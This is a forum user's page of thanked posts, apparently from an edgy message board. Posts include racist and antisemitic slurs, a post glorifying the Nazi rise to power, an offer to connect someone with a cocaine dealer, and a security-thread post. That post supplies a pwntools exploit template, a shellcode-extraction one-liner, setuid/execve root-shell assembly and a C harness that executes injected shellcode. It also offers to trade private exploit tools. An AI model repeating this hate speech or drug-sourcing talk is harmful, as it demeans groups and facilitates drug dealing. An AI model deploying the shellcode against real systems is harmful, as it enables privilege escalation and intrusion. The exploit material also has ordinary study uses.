User Controls
Thanked Posts by Sophie
-
2021-01-19 at 2:35 AM UTC in is roshambo deadThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-01-18 at 5:32 PM UTC in is roshambo dead
Originally posted by Kev maybe, but religion is just as much of a demographic distinction as race. of course they shouldnt get free shit because jedis make the majority of billionaires, they are privileged as fuck. but they will tell blacks that crackers are the problem.
nah thats you, ya ghetto shit-eater. i can afford a van if im feeling horny, you probably grope bitches in elevators.
Can't van me if i'm already in a van.
*Points at noggin*The following users say it would be alright if the author of this post didn't die in a fire! -
2021-01-18 at 5:22 AM UTC in National Socialism is the only way to the starsNot so long ago in Weimar Germany...
Chaos! After The 'War to end all wars' Germany has been cast into turmoil.
The Judeo-Bolsheviks, the Freikorps, the National Socialists and
the Weimar Government under the leadership of Paul von Hindenburg
are all vying for control. Communists and National Socialists are
fighting in the streets.
The situation seems hopeless, but there may be a light at the end of it all
soon there will be elections and one artist from Austria is running for chancellor
When the Nazi Party controls the apparatus of state all opposition can be stamped out
But can democracy be used to undermine democracy? One mustachioed hero believes it can!The following users say it would be alright if the author of this post didn't die in a fire! -
2021-01-18 at 1:26 AM UTC in I'm so lonely that i try to keep Comcast customer service females on the line....
Originally posted by CandyRein So …my boyfriend and I were having sex and I’m on top riding but it’s the low ride kind where you’re chest to breast and the girls ass is bouncing up and down..
I’m just doin my thing and suddenly he legit like bear hugs me really hard and starts crying saying he doesn’t ever want to lose me…and how much he loves me …etc
He literally cried tears of joy during sex…
We Been drinking a little tho
If you love your boyfriend stop emasculating him in public, thank me later.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-01-18 at 12:31 AM UTC in The Efficiency of Extraction and Conversion of Pseudoephedrine to Methamphetamine from Tamper-Resistant Formulations.Our father, who art in Space. Hallowed be thy name, thy synth has come to the plebs as it is in the labs. Forgive us our forays into energetic chemistry as we forgive those that blow loads around us. Lead us not into sobriety but deliver us into addiction.
Amen.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-01-18 at 1:40 AM UTC in wow pretty amazing work here guysThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-01-17 at 11:12 AM UTC in Hate Rhymes.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-01-17 at 1:40 PM UTC in Hate Rhymes.Freemindaz you know i dig it.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-01-17 at 9:46 AM UTC in The leftist cries out in pain as he steals your electionThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-01-16 at 5:34 PM UTC in Inauguration in one weekThe US of A is lost. Get a bug-out bag, scope out a nice place in some rural area or in the mountains. Grab your guns, don't let them take them whatever you do. Shits about to get real.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-01-16 at 10:31 PM UTC in Steal my XSRF Token again and i'll kill you.23:50. Submit. I don't make idle threats.
-
2021-01-16 at 10 PM UTC in The Retarded Thread: Get off that bus editionThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-01-16 at 9:12 PM UTC in The Retarded Thread: Get off that bus editionThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-01-16 at 5:15 PM UTC in The Retarded Thread: Get off that bus edition
Originally posted by Robert Mugabe Someone told me it's gone downhill somewhat over there? Not been for a good few years. Is there less coffee shops or something?
Nah, the lockdown measures have just affected coffeeshops in the same way they have bars and other such places. However contrary to the US, my government doesn't need to go into debt to breath life into stimulus packages. We're not getting 600/2000 euros checks but there is a relief fund managed by the government for small businesses. So most small businesses will be okay in the end. And if not, i know daelers in Rotterdam, Amsterdam and The Hague that carry anything from weed and hashish to XTC and coke.
You like coke right. If you have the money we should definitely drive to The Hague, my coke hookup there is not some niger on the street he is middle management so if you have the money you get as pure as he gets it, which is between 80-90% cocaine, the rest is mannitol. I bought a gram a little while ago, which i shared with my gf, and it lasted me three days. That should give you an idea about the purity.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-01-16 at 4:58 PM UTC in The Retarded Thread: Get off that bus editionThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-01-16 at 4:31 PM UTC in The Retarded Thread: Get off that bus edition
Originally posted by Robert Mugabe I really need to see a doctor. I'm constantly feeling angry, like a deep rooted rage coupled with anxiety. But there's also suicidal thoughts which I don't understand. This seems to be all the time.
Just wish I could I feel normal again.
Fuck.
Make an appointment with your doctor and get a referral to a psychologist. IDK how it works in the UK, but around here when you get a referral you have a lot of options, private practices and organizations. Not sure if the NHS has absorbed all such facilities over there, but i would suggest talking to an organization or a professional that can put in motion a multi-disciplinary approach. So for instance there is a medical center close to me and when you go there with your doctor's referral they will set up a comprehensive treatment plan. So each client if you will gets assigned a psychologist, a psychiatrist and what is called a care coordinator. The coordinator's job is to pull in the resources that will be most helpful for you, your specific troubles and making sure you are getting effective treatment.
It's actually quite impressive, the depth and breadth of mental health care we have here. I hope you have access to the same kind of facilities. The most worrying of what you described is intrusive thoughts of suicidal ideation. It is most likely a compounding effect of any personality or trauma issues. I don't know you well enough to say for sure. So you definitely should look into getting the appropriate care.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-01-12 at 1:47 PM UTC in Coding is hard to concentrate on.
Originally posted by tee hee hee Its a job for mennerds
It's a category of careers reserved for higher IQ people. Whether you use your skills within or outside of the law. It requires at the very least solid problem solving skills, and it pays well, whether you are self-employed or work for a small or big company.
What line of work are you in?The following users say it would be alright if the author of this post didn't die in a fire! -
2021-01-03 at 10:13 AM UTC in Coding is hard to concentrate on.Being just in it for the money is a sure fire way to get stuck in a job that will suck the life out of you by the way. Also, maybe you'd enjoy coding a bit more if you were making something other than a website.
Even if you kick ass at Python and Django coding something like NIS is going to be a lot of work.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-01-08 at 2:59 PM UTC in Low level development and security thread.Sup niggas, i was wondering if those of you who are so inclined would be willing to share any of the utilities, resources and/or tools you like to use when working with/on automating certain aspects of low level security. Yes i already have a debugger, multiple in fact(Including Radare2, looking at you Bueno). I also have an assembler, linker, compiler and a tool for static code analysis. But that's not really the type of tool i'm looking for or talking about.
I'm not sure if you're familiar but there's a Python tool/library that's useful in terms of exploit and payload development called pwntools. If you're interested just install it with `pip3 install pwntools`. Besides providing tools that'll let you patch ELF files from the CLI and having a built in disassembler among other things, when imported as a lib it allows you to do cool stuff like:
from pwn import *
# Set up pwntools for the correct architecture
context.update(arch='i386')
exe = './path/to/binary'
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())
# Exploit goes here
io = start()
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)
io.interactive()
This is the kind of tool i'm talking about. And since i don't just want to come here hat in hand i will share some of the stuff i like to use as well. Like ROPGadget.py which lets you search for gadgets in a binary. It supports several file formats and architectures and is pretty useful for ROPChaining.
git clone https://github.com/JonathanSalwan/ROPgadget.git
I also recently came across a tool called Shellnoob, which despite it's name is pretty 1337. Besides that though it's mostly very convenient because among other things it can convert between the following file types:
Supported input: asm, obj, bin, hex, c, shellstorm
Supported output: asm, obj, exe, bin, hex, c, completec, python, bash, ruby, pretty, safeasm
It can also NOP out fork() calls and patch executables has interactive ASM to opcode mode, resolves syscall numbers and supports both ATT and Intel syntax. Not to mention it was accepted for Blackhat Arsenal, which gives it some serious street cred if you ask me.
git clone https://github.com/reyammer/shellnoob.git
Personally i like to keep a little cheatsheet handy in order to remember some useful Linux utilities related to what we are talking about.
# Dump hex first 128 bytes
xxd -l 128 <filename>
# Dump binary first 128 bytes
xxd -b -l 128 <filename>
# Dump c-style header first 128 bytes at a 256-bytes offset
xxd -i -s 256 -l 128 <filename>
# Check relocations inside the object file
readelf --relocs <filename>.o
# Dump all headers
readelf --headers <filename>
# Dump everything
readelf --all <filename>
# List symbols from object file
nm <filename>
# List and demangle dynamic symbols from stripped object file
nm -D --demangle <filename>
# Get preprocessing output
gcc -E -P <source_file>.c > <preprocessing_output>.i
# Add current path to the linker environment
linker=$(export LD_LIBRARY_PATH=`pwd`)
# Trace SysCalls
strace <filename> `ltrace -i -C <filename>`
# Simple disassembly of an object file
objdump -M intel -d <filename>.o
# Extract shellcode from .sc or .o/.obj file
objdump -d $filename | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: |cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
If you got anything to add to the cheatsheet, please do. That last one is particularly useful. If you take the below Assembly(ATT).
global _start
section .text
_start:
; setuid(0)
xor edi,edi
push rdi ; null terminator for the following string
push 105
pop rax
; push /bin//sh in reverse
mov rbx,0xd0e65e5edcd2c45e
syscall
; execve
ror rbx,1
mov al,59
push rbx
xchg esi,edi
push rsp
cdq
; store /bin//sh address in RDI, points at string
pop rdi
; Call the Execve syscall
syscall
Compile it with NASM like so:
nasm -felf64 XorSh.nasm -o XorSh.o && ld XorSh.o -o XorSh
You can now either run the compiled ELF binary `./XorSh` or extract shellcode from the object file and use it to inject it with Python, or use it as payload in a C program. If you extract the shellcode you can use the below C program to test it.
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/mman.h>
/* should be enough to hold your shellcode, if not just set this to a higher value */
#define BUFSIZE 4096
/* set to 1 to enable debugging, will break before executing the shellcode */
#define DEBUGGING 0
/* either paste your shellcode in here ... */
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc, char* argv[])
{
size_t len;
char *buf, *ptr;
printf("[*] Allocating executable memory...\n");
buf = mmap(NULL, BUFSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
ptr = buf;
printf("[+] Buffer @ %p\n", buf);
#if DEBUGGING
ptr[0] = '\xcc';
ptr++;
#endif
/* ... or pass it as filename to the program */
if (argc > 1) {
printf("[*] Reading shellcode from file...\n");
FILE *f = fopen(argv[1], "r");
if (!f) {
fprintf(stderr, "[-] Cannot open %s: %s\n", argv[1], strerror(errno));
exit(-1);
}
len = fread(ptr, 1, BUFSIZE, f);
fclose(f);
} else {
len = sizeof(shellcode);
printf("[*] Copying shellcode...\n");
memcpy(ptr, shellcode, len);
}
printf("[+] Done, size of shellcode: %i bytes\n", len);
printf("[*] Jumping into shellcode...\n\n");
(*(void (*)()) buf)();
return 0;
}
It would also be pretty easy to adjust the above program to just run the shellcode, but you might as well just run the ELF binary i guess. Anyway, if you have anything to add provided it's along the lines of what i posted please do so.
If you have something really special, like a tool you coded yourself that's particularly useful with regards to this stuff. I may trade you something special in return. I have a closed source Windows tool, complete with GUI that automates finding ROPGadgets and making ROPChains, it's not for sale anywhere, and only a few people have this tool. It's excellent for exploit development targeting Windows. I will send you the source files for this tool if you have something special to trade for it.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-01-08 at 11:47 PM UTC in The media do nothing but spread fearThe hacker known as 4chan is a talentless bitch.The following users say it would be alright if the author of this post didn't die in a fire!
